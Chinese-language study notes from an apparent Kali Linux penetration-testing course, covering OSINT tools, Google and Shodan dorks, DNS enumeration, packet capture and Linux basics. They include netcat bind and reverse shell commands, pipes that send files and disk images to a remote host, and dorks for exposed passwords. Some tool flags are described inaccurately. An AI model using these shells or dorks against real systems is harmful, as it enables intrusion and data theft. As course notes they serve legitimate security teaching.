recon-ng （信息收集框架）这个框架可以完整完成被动收集 全特性web侦查框架 基于python开发

通过一些模块实现功能

做某些事情的一些功能组合在一起的规范、容器叫框架（房屋的骨架），内部还需要加工 

模块 模块来实现具体功能 现在大约有几十个模块

数据库 搜索出的结果自动存进数据库

报告 可以用此模块来生成一个报告

按两下tab键显示命令的参数

recon-ng -w 生成一个工作空间，实现不同搜索的信息的隔离

-r 调用文件里写好的命令

recon-ng 进入框架

keys 指定api的key

load 载入模块

pdb 调用python的debug

query 跟数据库查询语句查询框架数据库

record 记录执行过的命令 生成一个文件

reload 重新加载模块

resource 调用命令文件

search 搜索可用的模块

set 设置搜索的变量 set proxy 127.0.0.1：xxxx 设置代理

set SOURCE query sql语句 通过一个sql语句设置

shell 在框架下执行shell命令

show 显示当前框架的信息

show schema 显示数据库结构

user-agent http数据包的包头 应该修改来伪装一下 

snapshots 创建一个空间快照 可以用来还原数据

unset 清空某设置

spool 划分资源池

use 使用各种具体的模块 

信息导出为报告

用报告模块 reporting

DNS可以做负载均衡

收集信息的途径多种多样，例如 社交网络 工商注册 新闻组/论坛 招聘网站 

http://archive.org 查网站的历史某一时间的快照 查看源码 技术 架构 发散思维运用多种方式 

个人专属密码字典 cupp 

-i 向导生成字典 根据向导输入信息生成字典文件

metadata元数据信息收集 

exif信息 有很多摄影爱好者关心的信息 gps信息 设备型号 安全从业者比较感兴趣 

exiftool 提取照片exif信息

foca（windows下的工具） 文件元数据信息提取工具

tmux 终端窗口复用器 分屏幕窗口

世界第四大搜索引擎-俄罗斯 yandex

http://www.yandex.com/

kali搜索工具

theharvester -d 指定一个域名 -b 指定用那个引擎的数据库搜索 -l 限制并发的搜索数量

proxychains 代理工具

metagoofil -d 指定域名 -t 指定下载的文件的类型 -l 线程，下载多少个 -o 

maltego 综合取证工具（现在已经更新了3.6了，功能强大，界面友好，图形化，一站式的搜索，靠碎片信息，勾勒出完整站点，需要英语） 

shodow搜索引擎特性 

/explore 帮助链接查看shodan语法

google爬网页 +含有的关键字 -不含有的关键字

""双引号框选表示一个整体

intitle：在标题

inurl：在url中

intext：在页面正文中

site：搜索哪个站点

site:fr 指定搜索法国的网站，cn就是中国

filetype:xls "username|password"文件类型

实例：搜交换机的配置界面 搜摄像头 搜登录界面 灵活运用 

http://exploit-db.com/google-dorks

google hacking database 学习Googlehacker

搜索引擎技术

shodow语法

shodan搜索引擎（www.shodan.io） 不爬网站，爬互联网设备 相当于shodan给做了主动扫描

物联网时代

参数多的时候加引号括起来

搜索联网的设备 

Banner信息： http ftp ssh telnet

net：加主机地址 显示使用该ip的详细地址

net：8.8.8.8/24 查c段主机

country：cn 或者us等 指定要搜的国家

city：beijing 指定城市

port：22 指定端口

HTTP/1.1 200 指定特征码

os："windows 2003"指定操作系统

hostname:www.baidu.com 指定主机名，也可以是 ip地址

server："apache" 查服务

例子：

200 OK cisco country:JP 搜索日本的思科设备

user：admin pass：password 

linux upnp avtech 组合一些特征字符串，作为筛选条件

dpkg debian的包管理程序 -L显示

dns区域传输 一般只能本域的服务器之间交换

dig @ns1.example.com example.com axfr 指定域名服务器和指定域名，axfr（全区域传输，用tcp传输）是区域传输使用的方法

host -t -l sina.com ns3.sina.com 

-t 显示时间 -l 全区域传输

man 查看手册

--help 查看帮助

info 查看信息

dns字典爆破 

fierce -dnsserver 8.8.8.8 -dns sina.com.cn -wordlist a.txt(字典文件，可是一个路径) 

dnsdict6 -d4 -t 16 -x sina.com 

-t 指定线程数 -d显示ipv6的信息 -d4显示IPv4 ipv6的地址 -D 指定用哪个字典 -s 用小字典 -x 用最大的字典 

dnsenum -f dnsbig.txt(有可能取运行目录下的) -dnsserver 8.8.8.8 sina.com -o sina.xml(存到哪个文件夹)

dnsmap sina.com -w dns.txt 差不多

dnssrecon -d sina.com --lifetime 10 -t brt -D dnsbig.txt

--lifetime 存活时间，等待响应的时间 

-t brt 制定强度 brt爆破

-D 指定字典

dnsrecon -t std -d sina.com

-t std 强度是标准破解方式，速度比brt慢一点

字典文件指定方式各有不同

dns注册信息

whois 不同地区有不同的whois 查询的网站不同 

whois

dns信息收集 dig

dig sina.com any @8.8.8.8 制定类型any 指定dns服务器8.8.8.8也可以不指定，建议多尝试用多个dns服务器解析，考虑地域对ip的影响。

dig数据筛选 +noall 什么都不显示 +answer 查看answer 也可以用管道过滤

dig ip反向查询域名 

dig -x ip地址 反查询 查出ptr记录

dig 查dns服务器bind版本（dns服务器用的主要软件包）

dig +noall +answer txt chaos VERSION.BIND dns服务器地址或者域名（一般查不到）

dns追踪（可以用来查出dns欺骗） dig +trace 加域名 直接向根域服务器发请求，直接进行迭代查询

一般电脑都是递归查询

13个.域的根域服务器

13个.com域的域名服务器从中选出一个服务器然后再查xxxx.com

被动信息收集 开源智能

公开渠道可获得的信息

与目标系统不产生直接交互

尽量避免留下一切痕迹

信息收集内容

IP地址段 域名信息 邮件地址 档图⽚数据 公司地址 公司组织架构 联系电话 / 传真号码 ⼈人员姓名 / 职务 ⺫标系统使⽤的技术架构 公开的商业信息

信息用途 

信息描述⺫目标发现 社会工程学攻击 物理缺口

DNS

带www叫FQDN 不带叫域名 

域名记录

A 主机记录把一个域名解析到一个地址上 C name记录 别名记录，把一个域名解析到另外一个ip上 ns 这个域的域名服务器的地址 MX 邮件交换记录，指向这个域的smtp服务器地址 ptr反向域名解析⼝

nslookup dns信息收集

进入nslookup 直接输入域名

set type=a （set q=a也一样）设置查询类型为a记录 参数可以为记录类型

mx记录 优先值越小 越优先

server参数 设置域名服务器

智能dns 导致不同地方用户查询的不同与cdn技术相结合

set q=any 任何类型

spf记录 做反垃圾邮件 讲一个ip地址反向解析 查出域名欺骗 过滤垃圾邮件

可以在进入nslookup时 键入 全部参数

例如 nslookup -q=any 163.com

tcpdump抓包工具 No-GUI的抓包分析工具 linux、Unix系统默认安装

默认只抓68个字节 通常可以把包头抓下来

tcpdump -h 查看可用命令 

-i 指定接口 -s 抓的数据包大小跟参数0表示全部抓先来 -w保存的文件 

tcpdump -i eth0 -s 0 -w file.pcap

tcpdump -r a.cap 查看a.cap包

-A -r 以阿斯克码显示 

port 端口号 指定抓某个端口的包

可以用管道来过滤

tcpdump -n -r http.cap | awk '{print $3}'| sort –u 

src host ip地址 以来源ip过滤

tcpdump -n src host 145.254.160.237 -r http.cap 

dst host 目标地址 以目标地址过滤

tcpdump -n dst host 145.254.160.237 -r http.cap 

按端口

tcpdump -n port 53 -r http.cap 

tcpdump -nX port 80 -r http.cap

tcpdump的高级筛选

过程文档记录工具

dradis 短期临时小团队资源共享 各种插件导入文件

keepnote 记录收集工具

truecrypt 加密工具 2014年停止更新，但加密安全性很高（使用一个加密工具）

wireshark根据数据包通过的端口判断数据包类型，依靠人的智慧，手动选择解码方式

wireshark专家系统，给人一些提示

wireshark信息统计功能

dns流量通常不是最大

wireshark缺陷

分析大数据包时表现不好

企业抓包

sniffer

cace/riverbed

cascad pilot

他们的底层大多基于wireshark

镜像端口 把一个物理口的流量镜像到另一个端口 镜像目的端口不能发包 较为高级的路由器 交换机可以实现

抓包是一种被动扫描

数据包包头分析

wireshark数据流查看模式fellow steam

数据流 http明文协议 smtp pop3 ssl

nc远程控制

正向

A：nc -lp 333 -c bash 被控制方 服务器

B: nc -nv 1.1.1.1 333 控制方 客户端

反向

A: nc -lp 333 控制方 客户端

B:nc -nv 1.1.1.1 333 -c bash 被控制方 服务器

init 6重启

注意：windows用户把bash改成cmd

缺点

传输信息不加密，容易被中间人劫持

缺乏身份验证

ncat包含于nmap工具包中，可以实现管道加密

A: ncat -c bash --allow 192.168.1.119 -vnl 333 --ssl 给出shell，指定来源ip并加密

B: ncat -nv 192.168.1.115 333 --ssl 链接被控制端且给出指定的相应加密方式

各nc版本参数不尽相同

man nc 看nc的用户手册，别的也可以看

wireshark抓包嗅探协议分析

实际抓包是靠抓包引擎而不是wireshark

引擎 libpcap9——linux winpcap10——windows

靠wireshark解码数据包

混杂模式 只要经过的数据包就抓

抓包筛选器 capture fiter指定参数来过滤包，只抓什么包

使用流程 选择网卡-start

保存数据包 停止抓包 file sava 选择pcap格式与其他抓包软件兼容性好

首选项 pre。。。。自定义wtreshark

显示筛选器 display fiter

传输文件

A: nc -lp 333 > 1.mp4

B: nc -nv 1.1.1.1 333 < 1.mp4 -q 1 传递完后一秒就断开

相反同样

B: nc -lp 1.1.1.1 333 < 1.mp4 -q 1 先把文件挂出来

A: nc -nv 333 > 1.mp4

传输目录

A：tar -cvf - music/ | nc -lp 333 -q 1 打包然后发送

B: nc -nv 1.1.1.1 333 | tar -xvf - 接受然后解包

加密传文件

A: nc -lp 333 | mcrypt --flush -Fbad -a rijndael-256 -m ecb > 1.mp4

B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1

流媒体服务

A: cat 1.mp4 | nc -lp 333

B: nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 - 通过一个管道，重定向到一个播放器

端口扫描

-z 扫描模式，探测端口，不进行io交换

nc -nvz 1.1.1.1 1-65535 探测tcp端口

nc -vnzu 1.1.1.1 1-1024 探测udp端口

远程克隆硬盘，也可以克隆内存

dd 硬盘块级别的备份（可以复制原来已经删除的文件），而不是文件级别的备份，

A: nc -lp 333 | dd of=/dev/sda 输出硬盘outfile

A: dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1 输入硬盘infile

netstat -pantu 查看端口

mtr 追踪路由

基本工具

作为客户端使用

nc/netcat 网络工具中的瑞士军刀

telnet/banner 

nc -nv 1.1.1.1 100（端口）链接

nc -v 追踪ip 不做域名解析

nc -n 显示详细的链接输出信息

nc -h 查看可用命令

pop3邮箱 110端口 core mail用的base64编码

smtp邮箱 25端口 GT gateway 网关 

base64 base64编码

文本信息传递

A：nc -l -p 4444 侦听打开一个端口

-l 侦听一个端口

-p 打开一个端口

B：nc -nv 1.1.1.1 4444 链接

 输入信息实现信息交换

电子取证中的应用

A：nc -l -p 333

B: ls -l | nc nv 10.1.1.12 333

A：nc -l -p 333 > ps.txt 输出重定向

B: ps aux | nc -nv 10.1.1.12 333 -q 1

-q 命令执行完成就退出

A：nc -l -p 333 > lsof 已经打开的文件

B：lsof | nc -nv 10.1.1.12 333 -q 1

长城防火墙，阻止中国人访问外边。

传输机密信息的时候用tor，使用暗网。

加密信息 隐藏来源 突破网络封锁 

goagent

并发线程限制 

Ulimite 限制当前shell内进程资源使用

查看默认值 Ulimite -a

ulimite -s 100 限制堆栈大小

ulimite -m 5000 -v 5000 限制shell内存大小kb

-m最大内存 -v虚拟内存

一直保持限制

编辑ulimite配置文件 

电源优化

服务开关

/etc/init.d/ssh start 有启动脚本

数值越大优先级越低

dhclient 网卡 自动获取网卡地址

ifconfig 网卡 ip地址 修改网卡地址

route 指定网关 route add default gw ip地址

netstat -

添加静态路由 route add -net ip地址/24 gw 网关地址 【网卡名】

配置dns vi /etc/resolv.conf

以上重启失效

修改网络配置文件 vi etc/network/interface

address 地址 netmask 子网掩码 network 网络地址 gateway 网关 配置dns dns-nameservers 加dns服务器地址

apt-get update 获取更新索引

apt-get upgrade 下载更新软件包

apt-get update --fiximissing 把过时的索引删除

更换更新源 vi /etc/apt/sources.list

系统升级 apt-get dis-upgrade

ls=dir 列出当前目录的内容

-l 长模式显示

d目录 c字符设备文件 l链接类此快捷方式 b块设备（硬盘、分区）

-la 显示隐藏文件 

.开头命名的文件是隐藏文件

-lh 以k m显示文件大小

sort 排序

cd 进入

. 当前目录 ..上级目录

pwd 查看当前工作目录

cat 查看文件内容

more 分屏查看文件内容 空格翻页 q退出

less 命令和more差不多 但是不显示百分比

tail 查看文件最下面10行内容 

-数字 查看几行

watch -n 秒数 每隔多少秒查看后边的内容

rm 移动

cp 拷贝

ps 进程信息 aux

-f 

grep 筛选输出内容 grep 包含内容 预被显示的内容

ifconfig 查看网络配置信息

ifconfig 网卡名称 down 关掉网卡

macchanger 修改网卡MAC地址 重启后会恢复

netstat 查看网络链接信息

netstat -pantu 查看tcp udp链接信息

管道方式 | egrep -v '0.0.0.0|：：：'|awk '{print $5}'

awk 显示第几列

cut -d ':' 根据冒号分块

sort 排序

uniq 去重

> 文件名 输出到目标文件

>> 文件名 追加写入

route

mount 挂载远程文件夹

mount -o kali.iso 文件夹 把iso文件挂载到文件夹下

dmesg 查看文件夹

find 查找文件 查找目录

find -name 名称 通过名称查找

-iname 不区分大小写查找

find . -name 名称 当前目录查找名称

whereis 查找文件在哪

whereis -b 查找二进制文件

echo 输出在shell

管道符 && || &

shell脚本 

read 读入赋值变量 $变量 使用变量 

chmod 更改权限 

chmod +x 文件名 增加运行权限

shell b类型

蓝色目录 白色普通文件 绿色可执行文件 红色压缩包

安全问题的根源是分层思想的优劣，只追求功能实现，但是最大的威胁是“人”。

黑白无绝对，网络无安全。

PETS

前期交互阶段：前期准备。一般以一个应用系统划分范围

情报收集阶段：收集测试对象的相关信息，主动，被动收集

威胁建模阶段：根据收集的信息，确定分析渗透线路，攻击途径

漏洞分析阶段：根据收集到的信息，分析可能存在的漏洞

渗透攻击阶段：尝试进攻系统，若受挫，继续重复先前的阶段。 

后渗透测试阶段：成功渗透以后进一步渗透，扩大影响。

渗透测试报告：呈现给对象全过程。

渗透测试项目：

渗透测试范围

获得授权

渗透测试方法：是否允许社会工程学 是否允许拒绝服务攻击

渗透测试误区：

扫描器就是一切，忽略业务逻辑中的漏洞

00:27:00